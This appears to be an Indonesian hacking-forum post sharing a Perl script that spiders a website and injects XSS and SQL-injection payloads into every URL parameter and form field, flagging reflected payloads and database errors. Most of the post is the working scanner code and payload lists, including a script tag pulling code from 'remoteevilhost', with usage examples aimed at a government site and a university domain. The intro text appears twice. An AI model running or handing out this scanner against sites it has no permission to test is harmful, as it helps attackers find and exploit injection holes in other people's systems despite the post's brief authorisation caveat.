Assalamualaikum All ketemu lg sama orang ganteng xsan-lahci
Ane mau share cara lain buat mencari bug XSS dan SQLi yang sekaligus menunjukkan di parameter mana letak kerentanannya pada situs target. Catatan penting: script ini mengirim payload serangan sungguhan (XSS dan SQL injection) ke target, jadi pakai hanya pada situs yang ente punya izin tertulis untuk diuji. Langsung saja, kodenya ada di bawah ini.
Simpan dengan nama apa saja, tapi pakai ekstensi .pl karena script ini ditulis dalam Perl; butuh modul LWP::UserAgent dan HTTP::Request::Common (paket libwww-perl) terpasang.
bisa juga paste dr pastebin ane
oke cara pakenya tinggal gini om
Kalau target rentan, script akan mencetak baris berawalan [!] yang menunjukkan parameter dan payload yang dipantulkan kembali tanpa di-encode atau yang memicu pesan error database/server, seperti di screenshot berikut. Baris [!] ini baru indikasi, bukan bukti eksploitasi — tetap verifikasi manual.
okeh semoga membantu happy ganteng wkwkwk
wkwkwk ane mo share nih cara lain mencari bugs xss dan sqli sampai di kasih tau letak vulnernya pd site target okeh langsung paste aja nih c0dinganya di bawah ini
Code:
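#!/usr/bin/perl
####################################
#CUp.[su]
#By skvoznoy and profit.
#greetz to ven000m,?erabyte,Benny_29a,Zadoxlik,payhash
#Zaco,YooogI,gema,?erm,xspider, KEZ, SkyOut
####################################
# Jane-Jane: crawls one site and probes its GET parameters and form
# fields with XSS / SQL-injection payloads, flagging responses that echo
# the payload back unencoded or that contain a database/server error
# string.  A flag is a lead to confirm by hand, not a proven exploit.
#
# The original comments were Russian and survived the paste only as
# '????'; they are rewritten in English here.  Several list literals
# also arrived with unescaped inner double quotes (e.g. alert("XSS")),
# which made the file fail to compile - those entries are re-escaped.
#
# This script sends attack traffic: run it only against hosts you are
# authorised to test.
####################################
# Generic probes for GET parameters (traversal, odd encodings, etc.)
####################################
@buglist = ("%00","%2527%252esasdf","?",
"??","/","../","./..././","/%2e/", "%2e","%5C","%s", "'","'''''","\"",
"%%%%%%","!!!!!!!!!!!!!!!!!!","#", "%5C27","%%5C%56" , "'", "\\",';',";a", "|",
"?>", "%a0");
# Server-side error fragments; each is used as a case-insensitive regex
# against the response body.  In the pasted copy several entries were
# wrapped across lines (so they contained a literal newline and could
# never match); they are joined back into single strings here.
@IMPROPERCOMMONFILTERING = ("<b>warning</b>:", "warning:", "<b>fatal error</b>",
"failed to open stream:", "internal server error",
"there was an error when processing this directive.",
"http/1.1 400", "http/1.1 403", "http/1.1 500", "gateway error",
"command not found", "file not found");
####################################
# XSS probes
####################################
# Canned payloads.  Analyzeurl checks payload N against
# $IMPROPERXSSFILTERING[N], so the two lists must stay the same length
# and in the same order.
@XSSbugs = (
"<script>alert('XSS')</script>",
"'';!--\"<XSS>=&{()}",
"<IMG SRC=\"javascript:alert('XSS');\">",
"<IMG SRC=javascript:alert(\"XSS\")>",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=javascript:alert('XSS')>",
"<SCRIPT/XSS SRC=\"http://remoteevilhost/xss.js\"></SCRIPT>",
"<IMG SRC=\"javascript:alert('XSS')\"",
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
"<IMG SRC='vbscript:msgbox(\"XSS\")'>",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
"<body onload=\"javascript:alert('XSS')\"></body>",
"<table background=\"javascript:alert('XSS')\"></table>",
"%22%2Balert(%27XSS%27)%2B%22",
">\"'><script>alert('XSS')</script>");
# Regexes that detect the payload above echoed back unencoded.  All
# parentheses and dots are escaped: the original left several bare,
# which turned them into capture groups / wildcards that could not match
# the literal text.  An entry for the %22%2Balert payload (its decoded
# form, "+alert('XSS')+") is added so the lists line up index for index.
@IMPROPERXSSFILTERING = (
"<script> *alert\\('XSS'\\) *</script>",
"<XSS>",
"<IMG SRC=\"javascript:alert\\('XSS'\\);\">",
"<IMG SRC=javascript:alert\\(\"XSS\"\\)>",
"<IMG SRC=javascript:alert\\(String\\.fromCharCode\\(88,83,83\\)\\)>",
"<IMG SRC=javascript:alert\\('XSS'\\)>",
"<IMG SRC=javascript:alert\\('XSS'\\)>",
"<SCRIPT/XSS SRC=\"http://remoteevilhost/xss\\.js\"></SCRIPT>",
"<IMG SRC=\"javascript:alert\\('XSS'\\)\"",
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert\\('XSS'\\);\">",
"<IMG SRC='vbscript:msgbox\\(\"XSS\"\\)'>",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert\\('XSS'\\);\">",
"<DIV STYLE=\"background-image: url\\(javascript:alert\\('XSS'\\)\\)\">",
"<body onload=\"javascript:alert\\('XSS'\\)\"></body>",
"table background=\"javascript:alert\\('XSS'\\)\"></table>",
"\"\\+alert\\('XSS'\\)\\+\"",
">\"'><script>alert\\('XSS'\\)</script>");
####################################
# SQL injection probes
####################################
# Entry 6 was garbled in the pasted copy ("" or ...).  It is restored as
# the bare variant completing the  ' / " / unquoted  pattern that entries
# 1-3 and 4-5 follow; confirm against the original if it is available.
@SQLbugs = ("' or 1=1--","\" or 1=1--","or 1=1--","' or 'a'='a","\" or \"a\"=\"a","or \"a\"=\"a","' OR 1=1","\" OR 1=1"," OR 1=1","or 0=0 #"," or 0=0 #","or 0=0 #");
# Database error fragments (case-insensitive regexes).  "sqlsyntax" is
# corrected to "sql syntax" (MySQL's message is "You have an error in
# your SQL syntax") and "[obdc" to "[odbc" (driver messages read
# "[ODBC ...").
@IMPROPERSQLFILTERING = ("\\[odbc", "mysql error", "you have an error in your sql syntax", "odbc drivers error", "\\[microsoft sql");
####################################
# XSS fuzz components.  The scanners send $begintag[i].$payload[j].$endtag[i]
# and look for $tagregex[i] together with $payloadregex[j] in the reply,
# so the three tag lists and the two payload lists must stay index-aligned.
####################################
@begintag = ("<IMG SRC=\"","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=","<DIV STYLE=\"background-image: url(","<body onload=\"","<table background=\"");
@endtag = ("\">","\">","\">",")\">","\"></body>","\"></table>");
@payload = ("javascript:alert('XSS')","javascript:alert(\"XSS\")","javascript:alert(String.fromCharCode(88,83,83))","javascript:javascript:alert('XSS')","javascript:javascript:alert('XSS')");
@tagregex = ("<IMG SRC","<LINK REL=\"stylesheet\" HREF=\"","<META HTTP-EQUIV=","<DIV STYLE=\"background-image: url","<body onload=","<table background=");
@payloadregex= ("javascript:alert\\('XSS'\\)","javascript:alert\\(\"XSS\"\\)","javascript:alert\\(String\\.fromCharCode\\(88,83,83\\)\\)","javascript:javascript:alert\\('XSS'\\)","javascript:javascript:alert\\('XSS'\\)");
####################################
use HTTP::Request::Common;
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
# Without a timeout one unresponsive request stalls the entire crawl.
$ua->timeout(20);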
sub URLcode {
    # Percent-encode a string: every non-word character (anything but
    # [A-Za-z0-9_]) becomes %XX with upper-case hex, word characters pass
    # through untouched.  Takes one string and returns the encoded copy;
    # the argument itself is not modified.
    my ($plain) = @_;
    my $encoded = join '', map {
        /\w/ ? $_ : sprintf('%%%02X', ord)
    } split //, $plain;
    return $encoded;
}
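sub f_Analyze
{
    # Fetch a page, find each <form ...> ... </form> in it, and submit the
    # form once per (input, payload) pair with the other inputs left at
    # their default values.  Three passes run per form: the canned
    # @XSSbugs strings, the @begintag/@payload/@endtag combinations, and
    # the @SQLbugs probes.  Findings are printed; nothing is returned.
    #
    # Reads the globals $ua, $verbose and the payload/regex lists defined
    # at the top of the file.  Parsing is line-oriented: a tag split over
    # several lines is not recognised, exactly as in the original.
    #
    # A [!] line means the payload (or a DB/server error string) came back
    # in the response body - a lead to confirm by hand, not a proven bug.
    #
    # Fixes over the original: the method test was `$formmethod == /POST/i`
    # (a numeric compare against a match on $_, true for every form, so
    # everything was POSTed); the fuzz and SQL passes looped to the never
    # assigned $inputcount and so never ran; @SQLTRICKS/$SQL/$XSS were
    # undefined names; GET forms were sent with the fields as headers;
    # the form's action was parsed but never used; @formvalues was not
    # cleared between forms; and a missing name/type/value attribute
    # reused the previous line's $1.
    my $targeturl = $_[0];
    my $html = $ua->request(GET($targeturl))->content();

    print "[@]Scanning forms on $targeturl\n";

    my $in_form = 0;
    my ($formaction, $formmethod) = ('', '');
    my (@names, @types, @values);

    foreach my $line (split /\n/, $html)
    {
        if ($line =~ /<form/i)
        {
            $in_form = 1;
            ($formaction) = $line =~ /action *= *"(.+?)"/i;
            ($formmethod) = $line =~ /method *= *"(.+?)"/i;
            $formaction = ''    unless defined $formaction;
            $formmethod = 'GET' unless defined $formmethod;   # HTML default
            @names = ();
            @types = ();
            @values = ();
        }
        if ($in_form && $line =~ /<input/i)
        {
            my ($name) = $line =~ / name *= *"(.+?)"/i;
            # An input without a name is never submitted by a browser.
            if (defined $name)
            {
                my ($type)  = $line =~ / type *= *"(.+?)"/i;
                my ($value) = $line =~ / value *= *"(.+?)"/i;
                push @names,  $name;
                push @types,  defined $type  ? $type  : 'text';
                push @values, defined $value ? $value : '';
            }
        }
        if ($in_form && $line =~ /<\/form/i)
        {
            $in_form = 0;
            my $action = _form_action_url($targeturl, $formaction);
            print "[+]Form found:\n";
            print "action: $action ($formmethod)\n";
            print "inputs:\n";
            for my $k (0 .. $#names)
            {
                print "[=]Name: $names[$k];Type: $types[$k];Value: $values[$k];\n";
            }
            _fuzz_form($action, $formmethod, \@names, \@values) if @names;
        }
    }
}

sub _form_action_url
{
    # Resolve a form's action attribute against the page it came from:
    # absolute http(s) URLs are used as-is, a leading '/' is root-relative,
    # anything else is relative to the page's directory.  An empty action
    # (or a page URL without an http(s) origin) falls back to the page URL.
    my ($page_url, $action) = @_;
    return $page_url unless defined $action && length $action;
    return $action if $action =~ m{^https?://}i;
    my ($origin, $path) = $page_url =~ m{^(https?://[^/?#]+)([^?#]*)}i;
    return $page_url unless defined $origin;
    return $origin.$action if $action =~ m{^/};
    $path = '/' unless length $path;
    $path =~ s{[^/]*$}{};              # drop the page name, keep the directory
    return $origin.$path.$action;
}

sub _submit_form
{
    # Submit the form at $action with input $idx set to $evil and every
    # other input at its default value; returns the response body.
    # POST sends a form-encoded body; GET puts the fields on the query
    # string by hand, because HTTP::Request::Common's GET treats extra
    # arguments as headers, not form data.
    my ($action, $method, $names, $values, $idx, $evil) = @_;
    my @pairs;
    for my $k (0 .. $#{$names})
    {
        push @pairs, $names->[$k], ($k == $idx ? $evil : $values->[$k]);
    }
    my $response;
    if ($method =~ /^post$/i)
    {
        $response = $ua->request(POST($action, \@pairs));
    }
    else
    {
        my @query;
        for (my $k = 0; $k < @pairs; $k += 2)
        {
            push @query, URLcode($pairs[$k]).'='.URLcode($pairs[$k + 1]);
        }
        my $sep = $action =~ /\?/ ? '&' : '?';
        $response = $ua->request(GET($action.$sep.join('&', @query)));
    }
    return $response->content();
}

sub _fuzz_form
{
    # Run the three payload passes against one form.  $names/$values are
    # array refs of the form's input names and default values.
    my ($action, $method, $names, $values) = @_;
    my $last = $#{$names};

    # Pass 1: canned XSS strings, checked against every reflection regex.
    for my $f (0 .. $#XSSbugs)
    {
        for my $i (0 .. $last)
        {
            print "[.]XSS bugs scan $names->[$i] ($f / $#XSSbugs)";
            print "[$XSSbugs[$f]]" if $verbose;
            print "\n";
            my $body = _submit_form($action, $method, $names, $values, $i, $XSSbugs[$f]);
            foreach my $re (@IMPROPERXSSFILTERING)
            {
                if ($body =~ m/$re/i)
                {
                    print "[!]XSS payload reflected unencoded in $names->[$i]: $XSSbugs[$f]\n";
                    last;
                }
            }
        }
    }

    # Pass 2: tag/payload combinations.  $c selects the prefix: none,
    # a raw quote-breaker, or the same URL-encoded (the original tested
    # for $c == 2 inside a loop that stopped at 1, so that variant never ran).
    for my $o (0 .. $#payload)
    {
        for my $c (0 .. 2)
        {
            for my $t (0 .. $#begintag)
            {
                my $injection = $begintag[$t].$payload[$o].$endtag[$t];
                $injection = ">\"'>".$injection   if $c == 1;
                $injection = ">%22%27>".$injection if $c == 2;
                for my $i (0 .. $last)
                {
                    print "[.]XSS-fuzz testing $names->[$i] ($o ($t / $#begintag) / $#payload)";
                    print "[$injection]" if $verbose;
                    print "\n";
                    my $body = _submit_form($action, $method, $names, $values, $i, $injection);
                    if ($body =~ /$tagregex[$t]/ && $body =~ /$payloadregex[$o]/)
                    {
                        print "[!]Possible XSS in $names->[$i]: $injection\n";
                    }
                }
            }
        }
    }

    # Pass 3: SQL injection probes, flagged on database error strings.
    for my $f (0 .. $#SQLbugs)
    {
        for my $i (0 .. $last)
        {
            print "[.]SQL bugs scan $names->[$i] ($f / $#SQLbugs)";
            print "[$SQLbugs[$f]]" if $verbose;
            print "\n";
            my $body = _submit_form($action, $method, $names, $values, $i, $SQLbugs[$f]);
            foreach my $re (@IMPROPERSQLFILTERING)
            {
                if ($body =~ m/$re/i)
                {
                    print "[!]Possible SQL injection in $names->[$i]: $SQLbugs[$f]\n";
                    last;
                }
            }
        }
    }
}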
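sub Analyzeurl
{
    # Split $targeturl into base URL and query string and fuzz every GET
    # parameter in turn, the others keeping their original values.  Pass
    # one sends the @begintag/@payload/@endtag XSS combinations; pass two
    # sends @XSSbugs, @SQLbugs and @buglist and looks for the matching
    # reflection / error-message regexes.  Each value is sent raw and
    # URL-encoded (via URLcode).  URLs without a query string are skipped.
    # Findings are printed; nothing is returned.  Reads the global $ua and
    # the payload/regex lists defined at the top of the file.
    #
    # A [!] line is a lead to confirm by hand, not a proven bug.
    #
    # Fixes over the original: the parameter lists are lexical (the
    # globals @getvarnames/@getvarvals grew across calls, so later pages
    # were tested with earlier pages' parameters); the URL is split at the
    # first '?' rather than the last; values containing '=' are kept whole;
    # the URL-encoded, ">%22%27>" and @buglist branches were dead code
    # behind loop bounds of 1, 2 and 2; and a missing regex partner for an
    # @XSSbugs entry no longer yields an empty pattern (which Perl treats
    # as "reuse the last successful regex").
    my $targeturl = $_[0];

    my ($baseurl, $query) = $targeturl =~ /^(.+?)\?(.+)$/;
    return unless defined $query;

    print "[@]Scanning GET parameters of $targeturl\n";

    my (@names, @vals);
    foreach my $pair (split /&/, $query)
    {
        my ($n, $v) = split /=/, $pair, 2;
        next unless defined $n && length $n;
        push @names, $n;
        push @vals, defined $v ? $v : '';
    }
    return unless @names;

    # Pass 1: tag/payload combinations.  $c: 0 bare, 1 raw quote-breaker,
    # 2 URL-encoded quote-breaker.  $enc: 0 raw, 1 URL-encoded.
    for my $o (0 .. $#payload)
    {
        for my $c (0 .. 2)
        {
            for my $t (0 .. $#begintag)
            {
                my $injection = $begintag[$t].$payload[$o].$endtag[$t];
                $injection = ">\"'>".$injection   if $c == 1;
                $injection = ">%22%27>".$injection if $c == 2;
                for my $i (0 .. $#names)
                {
                    for my $enc (0, 1)
                    {
                        my $evil = $enc ? URLcode($injection) : $injection;
                        print "[.]XSS scan $names[$i] ($o ($t / $#begintag) / $#payload) (Urlencoding: $enc)\n";
                        my $body = _fetch_with_param($baseurl, \@names, \@vals, $i, $evil);
                        if ($body =~ /$tagregex[$t]/ && $body =~ /$payloadregex[$o]/)
                        {
                            print "[!]Possible XSS: $evil in $names[$i] (Urlencoding: $enc)\n";
                        }
                    }
                }
            }
        }
    }

    # Pass 2: canned lists.  The XSS list is checked against its
    # index-paired regex only; the other two against every regex in
    # their list, as the original did.
    my @passes = (
        [ 'XSS',     \@XSSbugs, \@IMPROPERXSSFILTERING,    1 ],
        [ 'SQL',     \@SQLbugs, \@IMPROPERSQLFILTERING,    0 ],
        [ 'generic', \@buglist, \@IMPROPERCOMMONFILTERING, 0 ],
    );
    for my $i (0 .. $#names)
    {
        foreach my $pass (@passes)
        {
            my ($label, $vulns, $filters, $paired) = @$pass;
            for my $enc (0, 1)
            {
                for my $x (0 .. $#{$vulns})
                {
                    my $evil = $enc ? URLcode($vulns->[$x]) : $vulns->[$x];
                    print "[.]Testing $names[$i] ($x / $#{$vulns})\n";
                    my $body = _fetch_with_param($baseurl, \@names, \@vals, $i, $evil);
                    my @checks = $paired ? ($filters->[$x]) : @$filters;
                    foreach my $re (@checks)
                    {
                        next unless defined $re && length $re;
                        if ($body =~ m/$re/i)
                        {
                            print "[!]Possible $label: $evil in $names[$i] (Urlencoding: $enc)\n";
                            last;
                        }
                    }
                }
            }
        }
    }
}

sub _fetch_with_param
{
    # GET $baseurl with parameter $idx set to $evil (listed first) and
    # every other parameter at its original value, sent raw as the
    # original did.  Returns the response body.
    my ($baseurl, $names, $vals, $idx, $evil) = @_;
    my @parts = ($names->[$idx].'='.$evil);
    for my $k (0 .. $#{$names})
    {
        next if $k == $idx;
        push @parts, $names->[$k].'='.$vals->[$k];
    }
    my $url = $baseurl.'?'.join('&', @parts);
    return $ua->request(GET($url))->content();
}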
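sub Spider
{
    # Crawl one page: fetch $baseurl.$dir.$page, run Analyzeurl (GET
    # parameters) and f_Analyze (forms) on it, then recurse into every
    # same-site <a href="..."> it contains.  The global @spideredlinks
    # records visited URLs so each page is processed once.  Nothing is
    # returned.  Reads the global $ua.
    #
    # Fixes over the original: the working variables are lexical (the
    # globals $baseurl/$dir/$page/@cont were overwritten by the recursion
    # and by Analyzeurl, which reassigns $baseurl, and @cont was replaced
    # while a foreach was iterating it); the visited check now covers
    # every link, not just those without a '/', so absolute links can no
    # longer send the crawl round in circles; and the leading-slash test
    # reads the first character of $dir instead of $dir[0], element 0 of
    # an unrelated array.  Fragments are dropped and protocol-relative or
    # non-HTTP links (mailto:, javascript:, ...) are skipped, as they
    # either never reach the server or leave the site.
    my ($baseurl, $dir, $page) = @_;
    my $targeturl = $baseurl.$dir.$page;

    foreach my $seen (@spideredlinks)
    {
        return if $seen eq $targeturl;
    }
    push @spideredlinks, $targeturl;

    print "[@]Spidering $targeturl\n";
    my @lines = split /\n/, $ua->request(GET($targeturl))->content();

    Analyzeurl($targeturl);
    f_Analyze($targeturl);

    foreach my $line (@lines)
    {
        next unless $line =~ /<a +href *= *"(.+?)"/i;
        my $link = $1;
        $link =~ s/#.*//;
        next unless length $link;
        next if $link =~ m{^//};
        next if $link =~ m{^[a-z][a-z0-9+.-]*:}i;

        print "[&]$link (from $targeturl)\n";
        if ($link =~ m{/})
        {
            my $cut      = rindex($link, '/') + 1;
            my $linkdir  = substr($link, 0, $cut);
            my $linkpage = substr($link, $cut);
            $linkdir = '/'.$linkdir if substr($linkdir, 0, 1) ne '/';
            Spider($baseurl, $linkdir, $linkpage);
        }
        elsif ($link ne $page)
        {
            Spider($baseurl, $dir, $link);
        }
    }
    return;
}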
sub Usage
{
    # Print the banner and invocation help to STDOUT, then exit.  Called
    # from the top level when fewer than three arguments are supplied.
    print <<'END_USAGE';
Jane-Jane
Version: 0.0.1
by skvoznoy and profit
How to start: jane.pl <server> <directory> <page> <anything for verbose> (optional)
Eg: perl jane.pl http://www.fbi.gov / index.php -v
END_USAGE
    exit;
}
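####################################
# Entry point: jane.pl <server> <directory> <page> [anything => verbose]
# The scanner sends attack payloads to every parameter and form field it
# finds - run it only against hosts you are authorised to test.
# (The original banner string was Russian mojibake; replaced in English.)
####################################
$verbose = 0;
Usage() if @ARGV < 3;
$verbose = 1 if @ARGV > 3;     # any fourth argument enables verbose output
print "Scanning '$ARGV[0]$ARGV[1]$ARGV[2]'...\n";
Spider($ARGV[0], $ARGV[1], $ARGV[2]);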
Simpan dengan nama apa saja, tapi pakai ekstensi .pl karena script ini ditulis dalam Perl; butuh modul LWP::UserAgent dan HTTP::Request::Common (paket libwww-perl) terpasang.
bisa juga paste dr pastebin ane
oke cara pakenya tinggal gini om
Quote:xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl
Jane-Jane
Version: 0.0.1
by skvoznoy and profit
How to start: Xss_SQL_Scan.pl <server> <directory> <page> <anything for verbose> (optional)
Eg: perl Xss_SQL_Scan.pl http://www.fbi.gov / index.php -v
xsan-lahci@ibt:~# perl Xss_SQL_Scan.pl http://target.ac.id / index.php -v
Kalau target rentan, script akan mencetak baris berawalan [!] yang menunjukkan parameter dan payload yang dipantulkan kembali tanpa di-encode atau yang memicu pesan error database/server, seperti di screenshot berikut. Baris [!] ini baru indikasi, bukan bukti eksploitasi — tetap verifikasi manual, dan jalankan hanya pada situs yang ente punya izin untuk diuji.
okeh semoga membantu happy ganteng wkwkwk